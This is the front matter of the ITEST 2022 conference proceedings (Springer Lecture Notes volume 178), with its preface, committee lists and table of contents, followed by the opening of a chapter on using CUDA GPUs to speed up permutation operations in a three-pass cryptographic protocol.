Lecture Notes on Data Engineering and Communications Technologies 178
Emil Faure · Olena Danchenko · Maksym Bondarenko · Yurii Tryus · Constantine Bazilo · Grygoriy Zaspa Editors
Information Technology for Education, Science, and Technics
Proceedings of ITEST 2022
Lecture Notes on Data Engineering and Communications Technologies, Volume 178
Series Editor: Fatos Xhafa, Technical University of Catalonia, Barcelona, Spain
The aim of the book series is to present cutting-edge engineering approaches to data technologies and communications. It publishes the latest advances on the engineering task of building and deploying distributed, scalable, and reliable data infrastructures and communication systems. The series has a prominent applied focus on data technologies and communications, with the aim of promoting the bridge from fundamental research on data science and networking to data engineering and communications that lead to industry products, business knowledge, and standardisation. Indexed by SCOPUS, INSPEC, EI Compendex. All books published in the series are submitted for consideration in Web of Science.
Editors

Emil Faure, Department of Information Security and Computer Engineering, Cherkasy State Technological University, Cherkasy, Ukraine
Olena Danchenko, Department of Computer Science and Systems Analysis, Cherkasy State Technological University, Cherkasy, Ukraine
Maksym Bondarenko, Department of Instrumentation, Mechatronics and Computerized Technologies, Cherkasy State Technological University, Cherkasy, Ukraine
Yurii Tryus, Department of Computer Science and Systems Analysis, Cherkasy State Technological University, Cherkasy, Ukraine
Constantine Bazilo, Department of Instrumentation, Mechatronics and Computerized Technologies, Cherkasy State Technological University, Cherkasy, Ukraine
Grygoriy Zaspa, Department of Software of Automated Systems, Cherkasy State Technological University, Cherkasy, Ukraine
ISSN 2367-4512 / ISSN 2367-4520 (electronic)
Lecture Notes on Data Engineering and Communications Technologies
ISBN 978-3-031-35466-3 / ISBN 978-3-031-35467-0 (eBook)
https://doi.org/10.1007/978-3-031-35467-0

© The Editor(s) (if applicable) and The Author(s), under exclusive license to Springer Nature Switzerland AG 2023

This work is subject to copyright. All rights are solely and exclusively licensed by the Publisher, whether the whole or part of the material is concerned, specifically the rights of translation, reprinting, reuse of illustrations, recitation, broadcasting, reproduction on microfilms or in any other physical way, and transmission or information storage and retrieval, electronic adaptation, computer software, or by similar or dissimilar methodology now known or hereafter developed.

The use of general descriptive names, registered names, trademarks, service marks, etc. in this publication does not imply, even in the absence of a specific statement, that such names are exempt from the relevant protective laws and regulations and therefore free for general use.

The publisher, the authors, and the editors are safe to assume that the advice and information in this book are believed to be true and accurate at the date of publication. Neither the publisher nor the authors or the editors give a warranty, expressed or implied, with respect to the material contained herein or for any errors or omissions that may have been made. The publisher remains neutral with regard to jurisdictional claims in published maps and institutional affiliations.

This Springer imprint is published by the registered company Springer Nature Switzerland AG. The registered company address is: Gewerbestrasse 11, 6330 Cham, Switzerland.
Preface
The proceedings include chapters on the main directions in the development of information technologies and systems and their applications in education, science, technology, economics, management, and medicine. The chapters are grouped in parts and consider issues related to computer modeling of physical, chemical, and economic processes; implementing information and communication technology; research and management of complex systems; training IT students at higher education institutions; and information security.

The volume opens with the first part, titled “Theoretical and Practical Aspects for Creating and Optimizing Modern Information and Communication Systems.” The authors of the first chapter present in-depth research on graphics processing units and determine their suitability for accelerating operations on permutations in three-pass cryptographic protocols. The second chapter is devoted to verifying the feasibility of significantly increasing radio communications stability without introducing structural redundancy into the system. The third chapter studies the effectiveness of a combined approach to simulation modeling of software. The results include the convolution method and an example of its use in the analysis of dynamic properties of models with parallelism, as well as a test of the methodology for detecting functional shortcomings in reduced simulation models of software components.

The second part, “System Information Technology in Complex Systems Modeling,” focuses on the Ukrainian airways network, which is a part of the global air transportation system, as well as on the ergatic aircraft control system and on assessing the quality of pilot training based on the analysis of changes in aircraft flight parameters.

The third part, titled “Information Technology in Engineering and Robotics,” opens with the sixth chapter, which investigates multimodal transport problems containing three means of transport and two objective functions. The authors consider the feasibility of reducing a multicriteria multimodal transport problem to a classical transport problem. The part continues with a chapter on the results of numerical experiments studying the stress–strain state of combined steel and concrete structures and their separate elements under load, and ends with a chapter on developing the process of intellectual control over the mechanical characteristics of optical products, its automation, and reducing computational complexity while increasing accuracy and reliability.

The fourth part, titled “Information and Communication Technology in Management,” proposes using the Analytic Hierarchy Process (AHP) to compare the input tasks of time management against the criteria of importance and urgency. The obtained experimental results confirm the expediency of the authors' combination of the Eisenhower matrix method and the AHP for solving time management problems.

The first chapter of the fifth part, “Information Technology in Intelligent Computing,” formulates the principles and tasks for the intellectualization of the project planning process. The concept of an intelligent add-on over project management software tools is proposed.
The next chapter presents a method for analytical information processing that makes it possible to forecast the development trends of the table tennis equipment market.

The sixth part, titled “Information and Communication Systems and Networks,” starts with a report on the research, development, and implementation of a method for permutation transmission over communication channels with a bit error probability close to 0.5. The next chapter proposes an intelligent signal measurement technique for spread spectrum software defined cognitive radio systems; a detailed analysis of the measurement accuracy of the proposed technique is presented. Then, the authors improve the enterprise 5G network architecture for further optimization of the production process. A 5G network planning method for enterprise production processes has been developed, consisting of radio network coverage, successive determination of the location of each base station, limiting the number of connections and ensuring their dependability, and constructing the communication transition segment. The sixth part continues with a chapter that offers a new solution to an important cybersecurity problem, namely system logs protection based on blockchains. The proposed system does not require deploying additional infrastructure and can be used within the existing architecture for collecting information about the operating system. The last chapter of the sixth part models information flows in operating systems, which makes it possible to identify threats to information security more effectively.

The seventh part, titled “Information and Communication Technology in Scientific Research,” contains four chapters. The first chapter analyzes the possibilities of using transdisciplinary ontology to represent information about the work of Ivan Franko. The authors of the next chapter present testing results of a software service for analyzing reactions to a moving object, which provides organization of and convenient operational control over the diagnostic procedure. The authors pay special attention to the prospects of applying this software service in sports, medical, psychological, physiological, aerospace, and pedagogical practice to diagnose the functional state of the central nervous system. The third chapter of the seventh part theoretically substantiates the model for studying the e-infrastructure ecosystem in Ukrainian universities to foster the development of open science in Ukraine. The part closes with a scheme for the communicative process of interaction of the objects in the “driver-vehicle-environment” (D-V-E) system. The authors propose to impose a system of properties inherent in a person on each object. The chapter presents a scheme for optimizing communication relationships based on the reactions of the driver's senses.

The eighth part, titled “Computer Modeling and Information Systems in Economics,” examines the multifractal cross-correlation relationships between stock and cryptocurrency markets. The study also endeavors to build a data processing model for improving e-commerce efficiency. The authors propose a cluster analysis of online markets for an enterprise's household products. Options for developing e-commerce and improving the marketing strategy are determined.
The ninth part, titled “Computer Modeling in Physical and Chemical Processes,” starts with a study on the dependence of the endurance limit of bowl cutter knives on their design parameters, as well as a study on the hydrodynamics of raw materials being ground in bowl cutters, meat grinders, and emulsifiers, performed to justify new ways to increase the productivity of these machines. The authors of the next chapter have created a computer model of the process of measuring continuously changing profiles of electrical conductivity and magnetic permeability in objects with a surface eddy current probe, as a tool for developing a computationally efficient metamodel on artificial neural networks, necessary for solving the inverse electrodynamic problem. The process of plastic deformation of steel DC04 is also investigated as a complex, nonlinear, irreversible, and self-organized process; measures for the quantitative assessment of the irreversibility of the deformation process are proposed. The ninth part continues with research on the chemical composition of hybrid eco-friendly biodegradable filled composites by a computer modeling method. The outcome of this research is a set of models for forecasting the performance properties of composites depending on their chemical composition. Then, printer layouts for the FDM process are analyzed and systematized. It is shown that fundamentally new approaches, which involve changing the base shape and movement type, in particular replacing the traditional table with a cylindrical rotating one, make it possible to better print products with thin cylindrical shells. The last chapter of the ninth part investigates computer modeling of the spectrum of primary beaten-out atoms and the concentration of point radiation defects in materials irradiated with electrons, using the cascade-probabilistic method. The study makes it apparent that accounting for energy losses makes a significant contribution to the spectrum of primary beaten-out atoms and to the defect concentration.

The tenth part is titled “Information Systems in Medicine.” Here, the authors of the first chapter demonstrate that mathematical modeling enables the development of effective, scientifically substantiated preventive and anti-epidemic measures. A gradient boosting model is built to calculate the predicted incidence of COVID-19. The next chapter analyzes the prospects of introducing a patient-oriented digital clinic with Internet of Medical Things (IoMT) support. This chapter also discusses the synthesis of data-generating personal medical components with artificial intelligence, machine learning, deep learning, virtual reality, augmented reality, and blockchain technologies in the environment of a digital clinic based on IoMT to improve the quality and availability of health care.

The eleventh part, titled “Information and Communication Technology in Education,” states that cybersecurity, as a part of information technology, requires the teachers' sustainable professional development. The authors consider the stages in which the process of training specialists in cybersecurity is built. The experience of introducing active learning methods into the educational process is presented, and its results are analyzed. The authors of the next chapter believe that learning through life becomes an important part of personal and professional development in a formal, informal, or non-formal environment. The study reveals four types of lifelong learning situations with different primary recommendation methods in each case. A generalized schema for providing recommendations in lifelong e-learning is suggested.

The first chapter of the twelfth part, titled “Training IT Experts at University,” aims at creating applied computer developments in the educational process for chemists-technologists. It reveals the use of all functions of independent work: cognitive, prognostic, educational, corrective, and independent ones.
The authors of the next chapter are convinced that the rapid recovery of the Ukrainian economy in the post-war period is possible only when there is a sufficient number of competitive and motivated IT specialists. The study offers a deep insight into the main problems of Ukrainian universities in the field of training IT specialists.

The thirteenth part, titled “Information Security,” opens with a chapter demonstrating that the characteristics of microwave range devices can be improved by applying both a new elemental base and new circuitry decisions. Mathematical models of W-parameters for structures of bipolar transistors having potential instability in a wide frequency range are developed, and their parameters are estimated within the frequency range. The goal of the next chapter is to identify and understand the vulnerabilities of hardware-based systems and related mechanisms in order to improve the corresponding security measures. The research has resulted in a prototype of a web-based system that collects information about modern hardware-related vulnerabilities and provides users with appropriate recommendations based on a specific situation. The authors of the next chapter show that when two or more wireless users operate simultaneously and differ in speed performance, the phenomenon of air monopolization appears, which exposes the imperfection of the built-in mechanisms of the IEEE 802.11 standard for the distribution of airtime. Algorithms implementing the Airtime Fairness technology are considered, and a theoretical substantiation of the efficiency of this technology is presented. The next chapter studies the existing vulnerabilities of the 5G ecosystem. The authors of the chapter propose a new cyber security function that relies on machine learning algorithms. The function contains firewall, intrusion detection, and intrusion protection systems. The described model has been integrated into the existing 5G architecture. The object of research in the next chapter is the process of digital processing of speech signals in voice authentication systems. The chapter considers the procedures for generating and directing voice signal phase data for use in authentication systems. The feasibility of using phase data is proved. The thirteenth part continues with extending the adaptive singular spectrum analysis method to the multiple channel case (to signal processing in an antenna array). The embedding process, which consists of selecting a part of the data vector to form the data matrix, is explained. The relationship between the vector smoothing operator used in antenna array signal processing and the embedding process is also shown. The authors of the next chapter describe energy systems in a number of countries that have improved and developed based on the concept of deep integration of energy and infocomm grids. The chapter highlights the concept of Smart Grid, possible vectors of attacks, and the identification of false data injection attacks into the flow of measurements received from the sensors. The next chapter is devoted to research on the global experience of implementing private 4G/5G networks. A network structure is presented, taking into account the peculiarities of the working process of a polygon measuring complex, and structure types of private 4G/5G networks are compared. In the closing chapter, a mathematical model for polarization switching in a ferroelectric capacitor is developed. The model adequately reflects the processes of writing and reading elements of FRAM memory and may be utilized in the automated design of ferroelectric storage elements and devices.

Emil Faure
Olena Danchenko
Maksym Bondarenko
Yurii Tryus
Constantine Bazilo
Grygoriy Zaspa
Organization
General Chair

Oleg Grygor (Cherkasy State Technological University, Ukraine)
Online Conference Organizing Chair

Yurii Tryus (Cherkasy State Technological University, Ukraine)
Program Chairs

Pavlo Kasyanov (National Technical University of Ukraine “Igor Sikorsky Kyiv Polytechnic Institute,” Ukraine)
Valeriy Bykov (Institute for Digitalisation of Education of the National Academy of Educational Sciences of Ukraine, Ukraine)
Oleksandr Volkov (International Research and Training Center for Information Technologies and Systems under the National Academy of Sciences of Ukraine and the Ministry of Education and Science of Ukraine, Ukraine)
Grygoriy Torbin (Ukrainian State Dragomanov University, Ukraine)
Yaroslav Shramko (Kryvyi Rih State Pedagogical University, Ukraine)
Tetyana Morozyuk (Technische Universität Berlin, Germany)
Dariusz Czerwiński (Lublin University of Technology, Poland)
Darkhan Akhmed-Zaki (Astana IT University, Kazakhstan)
Yurii Tryus (Cherkasy State Technological University, Ukraine)
Emil Faure (Cherkasy State Technological University, Ukraine)
Publication Chairs

Yurii Tryus (Cherkasy State Technological University, Ukraine)
Emil Faure (Cherkasy State Technological University, Ukraine)
Publicity Chairs

Liudmyla Usyk (Cherkasy State Technological University, Ukraine)
Anton Maksymov (Cherkasy State Technological University, Ukraine)
Program Committee Members

Michael Orloff (Technische Universität Berlin, Germany)
Elena Eyngorn (Technische Universität Berlin, Germany)
Juriy Plotkin (Berlin School of Economics and Law, Germany)
Jerzy Montusiewicz (Lublin University of Technology, Poland)
Marek Milosz (Lublin University of Technology, Poland)
Grzegorz Koziel (Lublin University of Technology, Poland)
Mikolaj Karpinski (University of Bielsko-Biala, Poland)
Andrii Biloshchytskyi (Astana IT University, Kazakhstan)
Omirbayev Serik (Astana IT University, Kazakhstan)
Mukhatayev Aidos (Astana IT University, Kazakhstan)
Beibut Amirgaliyev (Astana IT University, Kazakhstan)
Didar Yedilkhan (Astana IT University, Kazakhstan)
Jamil Al-Azzeh (Al-Balqa University, Jordan)
Maxim Iavich (Caucasus University, Georgia)
Arnold Kiv (Ben-Gurion University of the Negev, Israel)
Dmytro Ageyev (Kharkiv National University of Radio Electronics, Ukraine)
Peter Bidyuk (National Technical University of Ukraine “Igor Sikorsky Kyiv Polytechnic Institute,” Ukraine)
Maxsym Bondarenko (Cherkasy State Technological University, Ukraine)
Volodymyr Halchenko (Cherkasy State Technological University, Ukraine)
Sergiy Gnatyuk (National Aviation University, Ukraine)
Serhii Holub (Cherkasy State Technological University, Ukraine)
Andriy Gusak (Bohdan Khmelnytsky National University of Cherkasy, Ukraine)
Olena Danchenko (Cherkasy State Technological University, Ukraine)
Vladimir Kukharenko (National Technical University “Kharkiv Polytechnic Institute,” Ukraine)
Oleksandr Lemeshko (Kharkiv National University of Radio Electronics, Ukraine)
Tetyana Mazurok (South Ukrainian National Pedagogical University named after K. D. Ushynsky, Ukraine)
Roman Odarchenko (National Aviation University, Ukraine)
Volodymyr Palahin (Cherkasy State Technological University, Ukraine)
Stanislav Pervuninsky (Cherkasy State Technological University, Ukraine)
Tatiana Prokopenko (Cherkasy State Technological University, Ukraine)
Tamara Radivilova (Kharkiv National University of Radio Electronics, Ukraine)
Viktor Romanenko (National Technical University of Ukraine “Igor Sikorsky Kyiv Polytechnic Institute,” Ukraine)
Volodymyr Rudnytskyi (Cherkasy State Technological University, Ukraine)
Serhiy Semerikov (Kryvyi Rih State Pedagogical University, Ukraine)
Oleksandr Serkov (National Technical University “Kharkiv Polytechnic Institute,” Ukraine)
Vitaliy Snytyuk (Taras Shevchenko National University of Kyiv, Ukraine)
Vladimir Soloviev (Kryvyi Rih State Pedagogical University, Ukraine)
Oleh Spirin (University of Educational Management, Ukraine)
Iurii Teslia (Cherkasy State Technological University, Ukraine)
Yurii Tryus (Cherkasy State Technological University, Ukraine)
Emil Faure (Cherkasy State Technological University, Ukraine)
Eugene Fedorov (Cherkasy State Technological University, Ukraine)
Vasyl Franchuk (Ukrainian State Dragomanov University, Ukraine)
Svitlana Lytvynova (Institute for Digitalisation of Education of the National Academy of Educational Sciences of Ukraine, Ukraine)
Alla Manako (International Research and Training Center for Information Technologies and Systems under the National Academy of Sciences of Ukraine and the Ministry of Education and Science of Ukraine, Ukraine)
Volodymyr Artemchuk (G.E. Pukhov Institute for Modelling in Energy Engineering, Ukraine)
Yevheniya Savchenko-Synyakova (International Research and Training Center for Information Technologies and Systems under the National Academy of Sciences of Ukraine and the Ministry of Education and Science of Ukraine, Ukraine)
Mariya Shyshkina (Institute for Digitalisation of Education of the National Academy of Educational Sciences of Ukraine, Ukraine)
Contents
Theoretical and Practical Aspects for Creating and Optimizing Modern Information and Communication Systems

Accelerating Operations on Permutations Using Graphics Processing Units . . . 3
Artem Lavdanskyi, Emil Faure, Artem Skutskyi, and Constantine Bazilo

Machine Learning Technique Based on Gaussian Mixture Model for Environment Friendly Communications . . . 13
Oleksii Holubnychyi, Yevhen Gabrousenko, Anatolii Taranenko, Olexandr Slobodian, and Olena Zharova

Applying a Combined Approach to Modeling of Software Functioning . . . 30
Oksana Suprunenko, Borys Onyshchenko, Julia Grebenovych, and Petro Nedonosko

System Information Technology in Complex Systems Modeling

Impact of Closed Ukrainian Airspace on Global Air Transport System . . . 51
Oleg Ivashchuk and Ivan Ostroumov

Analysis of Approach Attitude for the Evaluation of the Quality of Pilot Training . . . 65
Yurii Hryshchenko, Victor Romanenko, Maksym Zaliskyi, and Tetiana Fursenko

Information Technology in Engineering and Robotics

Solving Multimodal Transport Problems Using Algebraic Approach . . . 83
Sergii Mogilei, Artem Honcharov, and Yurii Tryus
Numerical Analysis of the Stress-Strain State of Combined Steel and Concrete Structures . . . 102
Grygorii Gasii, Olena Hasii, Ivan Skrynnik, and Oleksandr Lizunkov

Intellectual Control of Mechanical Characteristics of Optical Products . . . 113
Iryna Makarenko, Eugene Fedorov, Yuliia Bondarenko, and Yevhenii Bondarenko
Information and Communication Technology in Management

Combined Method of Solving Time Management Tasks and Its Implementation in the Decision Support System . . . 131
Anton Maksymov and Yurii Tryus

Information Technology in Intelligent Computing

Development of the Concept of Intelligent Add-On over Project Planning Instruments . . . 149
Iurii Teslia, Oleksii Yegorchenkov, Iulia Khlevna, Nataliia Yegorchenkova, Yevheniia Kataeva, Andrii Khlevny, and Ganna Klevanna

Self-organization of the Table Tennis Market Information Bank Based on Neural Networks . . . 162
Valeriy Tazetdinov, Svitlana Sysoienko, and Mykola Khrulov

Information and Communication Systems and Networks

A Method for Reliable Permutation Transmission in Short-Packet Communication Systems . . . 177
Emil Faure, Anatoly Shcherba, Bohdan Stupka, Iryna Voronenko, and Alimzhan Baikenov

Intelligent Signal Measurement Technique for Spread Spectrum Software Defined Cognitive Radio Systems . . . 196
Oleksii Holubnychyi, Maksym Zaliskyi, Anatolii Taranenko, Yevhen Gabrousenko, and Olga Shcherbyna

Optimal Structure Construction of Private 5G Network for the Needs of Enterprises . . . 208
Roman Odarchenko, Tatiana Smirnova, Oleksii Smirnov, Serhii Bondar, and Dmytro Volosheniuk

Linked List Systems for System Logs Protection from Cyberattacks . . . 224
Victor Boyko, Mykola Vasilenko, and Valeria Slatvinska

Information Flows Formalization for BSD Family Operating Systems Security Against Unauthorized Investigation . . . 235
Maksym Lutskyi, Sergiy Gnatyuk, Oleksii Verkhovets, and Artem Polozhentsev
Information and Communication Technology in Scientific Research

Ontological Modeling in Humanities . . . 249
Viktoriia Atamanchuk and Petro Atamanchuk

Software Service for Analyzing Reactions to a Moving Object . . . 260
Constantine Bazilo, Yuriy Petrenko, Liudmyla Frolova, Stanislav Kovalenko, Kostiantyn Liubchenko, and Andrii Ruban

Modelling the Universities' E-Infrastructure for the Development of Open Science in Ukraine . . . 275
Iryna Drach, Olha Petroye, Nataliia Bazeliuk, Oleksandra Borodiyenko, and Olena Slobodianiuk

Optimization of the Communicative Process in the System “Driver-Vehicle-Environment” . . . 299
Volodymyr Lytovchenko and Mykola Pidhornyy

Computer Modeling and Information Systems in Economics

The Analysis of Multifractal Cross-Correlation Connectedness Between Bitcoin and the Stock Market . . . 323
Andrii Bielinskyi, Vladimir Soloviev, Victoria Solovieva, Andriy Matviychuk, and Serhiy Semerikov

Using Data Science Tools in E-Commerce: Client's Advertising Campaigns vs. Sales of Enterprise Products . . . 346
Tetiana Zatonatska, Tomasz Wołowiec, Oleksandr Dluhopolskyi, Oleksandr Podskrebko, and Olena Maksymchuk

Computer Modeling in Physical and Chemical Processes

Simulation of Influence of Constructive Parameters of Meat Bowl Cutter Knives on Their Endurance at Alternative Oscillations . . . 363
Olexandr Batrachenko

Modelling of Hydrodynamics of Meat Raw Materials When Crushing It in Meat Cutting Machines . . . 386
Olexandr Batrachenko

Computer Simulation of the Process of Profiles Measuring of Objects Electrophysical Parameters by Surface Eddy Current Probes . . . 411
Volodymyr Halchenko, Ruslana Trembovetska, Constantine Bazilo, and Natalia Tychkova
Irreversibility of Plastic Deformation Processes in Metals . . . 425
Arnold Kiv, Arkady Bryukhanov, Andrii Bielinskyi, Vladimir Soloviev, Taras Kavetskyy, Dmytro Dyachok, Ivan Donchev, and Viktor Lukashin

Computer Modeling of Chemical Composition of Hybrid Biodegradable Composites . . . 446
Vladimir Lebedev, Denis Miroshnichenko, Dmytro Savchenko, Daria Bilets, Vsevolod Mysiak, and Tetiana Tykhomyrova

A New FDM Printer Concept for Printing Cylindrical Workpieces . . . 459
Alexandr Salenko, Anton Kostenko, Daniil Tsurkan, Andryi Zinchuk, Mykhaylo Zagirnyak, Vadim Orel, Roman Arhat, Igor Derevianko, and Aleksandr Samusenko

Computer Modeling of Processes of Radiation Defect Formation in Materials Irradiated with Electrons . . . 484
Tat'yana Shmygaleva and Aziza Srazhdinova

Information Systems in Medicine

Forecasting of COVID-19 Epidemic Process in Ukraine and Neighboring Countries by Gradient Boosting Method . . . 503
Dmytro Chumachenko, Tetyana Chumachenko, Ievgen Meniailov, Olena Muradyan, and Grigoriy Zholtkevych

The Internet of Medical Things in the Patient-Centered Digital Clinic's Ecosystem . . . 515
Inna Kryvenko, Anatolii Hrynzovskyi, and Kyrylo Chalyy

Information and Communication Technology in Higher Education

Implementation of Active Cybersecurity Education in Ukrainian Higher School . . . 533
Volodymyr Buriachok, Nataliia Korshun, Oleksii Zhyltsov, Volodymyr Sokolov, and Pavlo Skladannyi

Recommendation Methods for Information Technology Support of Lifelong Learning Situations . . . 552
Mykhailo Savchenko, Kateryna Synytsya, and Yevheniya Savchenko-Synyakova
Training IT Experts in Universities

Creating of Applied Computer Developments in the Educational Process in the Training of Chemists-Technologists . . . 567
Olga Sergeyeva and Liliya Frolova

The Potential of Higher Education in Ukraine in the Preparation of Competitive IT Specialists for the Post-War Recovery of the Country's Economy . . . 582
Oksana Zakharova and Larysa Prodanova

Information Security

Standard and Nonstandard W-parameters of Microwave Active Quadripole on a Bipolar Transistor for Devices of Infocommunication Systems . . . 599
Andriy Semenov, Oleksandr Voznyak, Andrii Rudyk, Olena Semenova, Pavlo Kulakov, and Anna Kulakova

Developing Security Recommender System Using Content-Based Filtering Mechanisms . . . 619
Maksim Iavich, Giorgi Iashvili, Roman Odarchenko, Sergiy Gnatyuk, and Avtandil Gagnidze

Analysis of Airtime Fairness Technology Application for Fair Allocation of Time Resources for IEEE 802.11 Networks . . . 635
Liubov Tokar and Yana Krasnozheniuk

5G Security Function and Its Testing Environment . . . 656
Maksim Iavich, Sergiy Gnatyuk, Giorgi Iashvili, Roman Odarchenko, and Sergei Simonov

Results of Experimental Research on Phase Data of Processed Signals in Voice Authentication Systems . . . 679
Mykola Pastushenko and Yana Krasnozheniuk

Sensor Array Signal Processing Using SSA . . . 697
Volodymyr Vasylyshyn

Method for Detecting FDI Attacks on Intelligent Power Networks . . . 715
Vitalii Martovytskyi, Igor Ruban, Andriy Kovalenko, and Oleksandr Sievierinov

Implementation of Private 4G/5G Networks for Polygon Measuring Complex Provision . . . 732
Igor Shostko and Yuliia Kulia
Mathematical Model of Electric Polarization Switching in a Ferroelectric Capacitor for Ferroelectric RAM . . . 749
Inna Baraban, Andriy Semenov, Serhii Baraban, Olena Semenova, Mariia Baraban, and Andrii Rudyk

Author Index . . . 771
Theoretical and Practical Aspects for Creating and Optimizing Modern Information and Communication Systems
Accelerating Operations on Permutations Using Graphics Processing Units

Artem Lavdanskyi, Emil Faure, Artem Skutskyi, and Constantine Bazilo
Cherkasy State Technological University, Cherkasy, Ukraine
[email protected]
Abstract. GPUs (graphics processing units) are used in many modern computer systems. They consist of a large number of low-performance computing units that can perform operations in parallel. In this case, the overall algorithm performance significantly increases compared to using a CPU (central processing unit). Tests of the resistance to a brute-force attack of cryptoprotocols that use operations on permutations, such as a three-pass cryptographic protocol, can be performed in parallel for different permutations. Therefore, it is important to determine the ability of graphics processing units to accelerate operations on permutations. For this, the following tasks have been solved in this study: the most used operations on permutations have been defined; program code that implements these operations and can use graphics processing units' hardware has been developed; and the performance of different approaches, including computing on the CPU and various modes of computing on the GPU, has been assessed. The results of the study indicate that using GPU hardware units to accelerate the multiplication of permutations is effective, provided that at least 5 such operations are performed simultaneously.

Keywords: Permutations · graphics processing unit · GPU · CUDA · brute-force attack · cryptographic protocol · general-purpose computing on graphics processing units
1 Introduction

A reliable and secure cryptographic protocol must meet requirements that guarantee that using it in real scenarios is safe. For this purpose, different statistical tests or evaluations may be used. As an example, statistical tests can be used to check the randomness of protocol output, like NIST STS [1], Diehard tests [2], the autocorrelation criterion [3, 4], TestU01 [5], and others [6, 7]. One of the evaluations used to check the strength of a cryptographic protocol is its resistance to a brute-force attack. It can be measured as the time needed for a cryptanalyst to determine the protocol keys, which would allow him to decrypt the encrypted message. This time must be significant.

Like any other cryptographic protocol, the three-pass cryptographic protocol based on permutations [8] can be attacked by brute force. Therefore, the parameters of the protocol must be determined in such a way that the possible time of breaking the protocol meets the requirements for its cryptographic strength. However, various hardware blocks, such as SIMD (single instruction, multiple data) instructions or GPUs (graphics processing units), can increase the speed of searching through possible cryptographic keys used in the protocol. Thus, it is necessary to know the speed of key search using specialized hardware units in order to set the parameters of the transformation, in particular the length of the key, and to ensure a certain strength of the cryptographic protocol.

On the other hand, the speed of communication is important when a protocol is used for communication between devices. This speed can be limited by the transmission channel or by the protocol algorithms running on the device to encrypt and decrypt data. In most cases, we cannot fix a slow transmission channel, but we can increase overall performance by adapting the protocol algorithms, in particular by using hardware blocks such as SIMD instructions or parallel computing on GPUs (if performance is limited by the algorithm's software implementation).

The three-pass cryptographic protocol based on permutations [8] uses different operations on permutations, such as permutation multiplication, decomposition of permutations into a product of disjoint cycles, permutation inversion, and others. In the simplest case, the operations used to run the protocol are calculated on a general-purpose CPU (central processing unit). It is possible to use SIMD instructions to speed up operations on permutations, as described in [9]. Another way to increase the performance of operations on permutations is to use modern GPUs [10–14].

The purpose of this study is to increase the speed of operations on permutations used in the three-pass cryptographic protocol [8] through the use of the CUDA (Compute Unified Device Architecture) platform. For this purpose, we need to solve the following tasks:

• The most used operations on permutations must be determined.
• The program code that implements operations on permutations and can use graphics processing units' hardware must be created.
• The performance of different approaches, including computing on CPU and various modes of computing on GPU, must be assessed and compared.
2 Materials and Methods

Various hardware systems can be used when data exchange or data processing is performed: a personal computer, a mobile phone, a server in a data center, etc. Some of these devices have hardware blocks that can help to speed up typical computational algorithms, like SIMD blocks in the CPU or CUDA cores in the GPU. Those hardware blocks solve only simple operations, but do so extremely fast [15]. There are also hardware implementations of different cryptographic algorithms in modern CPUs, AES as an example, that can be used to accelerate them [16]. However, this is rarely the case for modern cryptoprotocols, because a lot of time can pass from the creation of a protocol to its implementation in hardware.

Initially, all calculations were made on the CPU, and the GPU was used only for showing the results of those operations to the user on the screen via some interface. As the requirements of tasks such as image and video processing, 3D modeling, and games increased, GPUs became more powerful and gained specialized units such as programmable shaders and floating-point support. These improvements made it possible to start using GPUs for different operations that require mathematical processing of large amounts of data. As described in the literature [17], the first attempts showed that the lower-upper factorization operation gained a significant speed-up using a GPU over a CPU. This type of computation is called general-purpose computing on graphics processing units (GPGPU).

Nowadays, there are mostly two separate companies that produce high-performance GPUs that can be used for GPGPU: Nvidia and AMD. Both of them have platforms, CUDA from Nvidia and ROCm from AMD, which allow developers to easily use their hardware for GPGPU. We use Nvidia CUDA in this study to accelerate operations on permutations.

Nvidia's CUDA platform allows GPUs to perform general-purpose computing in parallel using hundreds and thousands of GPU cores. Such an approach drastically speeds up algorithms that process large blocks of data, such as sorting, wavelet transformation, cryptography, molecular dynamics, machine learning, etc. Starting from the Nvidia GeForce 8800, all Nvidia GPUs support the CUDA API [18]. CUDA can be used with Microsoft Windows and different Linux distributions (Debian, CentOS, Ubuntu, etc.). Developers can use CUDA with such programming languages as C, C++, and Fortran. Also, third-party wrappers for other popular programming languages, such as Python or Java, are available.

In the following, we briefly describe the common Nvidia GPU architecture to show the concepts of GPGPU computing using the CUDA platform. We use the latest Nvidia architecture, called Ampere, particularly the GA102 chip [19]; these specifics also apply to past GPU generations. A typical Nvidia GPU (device) consists of Graphics Processing Clusters (GPC), Texture Processing Clusters (TPC), Streaming Multiprocessors (SM), memory controllers, and other units. GA102 consists of 7 GPCs. Each GPC consists of 6 TPCs, and each TPC consists of 2 SMs. CUDA cores are part of an SM, and each SM has 128 CUDA cores (grouped into 4 processing blocks (partitions), each with 32 CUDA cores). So, in total, there are 10,752 CUDA cores in the GA102 chip. They can be used for GPGPU computing. All CUDA cores have computational units and registers that can perform different operations on both integers and floating-point numbers and have access to the device memory. Each CUDA core can load data from the device memory to a register and perform the reverse operation relatively fast. This is explained by the fast GPU memory and its interface (GDDR6X or HBM2 with bandwidth up to 2,039 GB/sec), including caches on the chip directly.

The GA102 chip, like any other common CUDA-enabled GPU, has several different types of hardware memory available: registers (16,384 32-bit common registers for each partition in an SM), L0 instruction cache (one for each partition), 128 KB of L1 data cache (one for each SM), 6,144 KB of L2 cache (total, for all SMs), and device memory (GDDR or HBM). The CUDA programming model makes those memories available to developers in the following form: registers (same as hardware registers), shared memory (part of the L1 cache, can be reconfigured depending on the task), local memory (located in device memory), global memory (device memory), and constant memory (located in device memory and cached in the constant cache).

Different approaches that use the described GPU hardware to increase the speed of cryptographic protocols are known.
In the study [20], the authors achieved a 20-fold speed-up of the advanced encryption standard (AES) algorithm with the use of the CUDA platform. In the study [21], the authors implemented a high-performance signature server that realizes the elliptic curve digital signature algorithm (ECDSA) using GPU acceleration. In the study [22], common techniques to implement and accelerate different block ciphers available in the OpenSSL cryptographic engine using a GPU are shown.

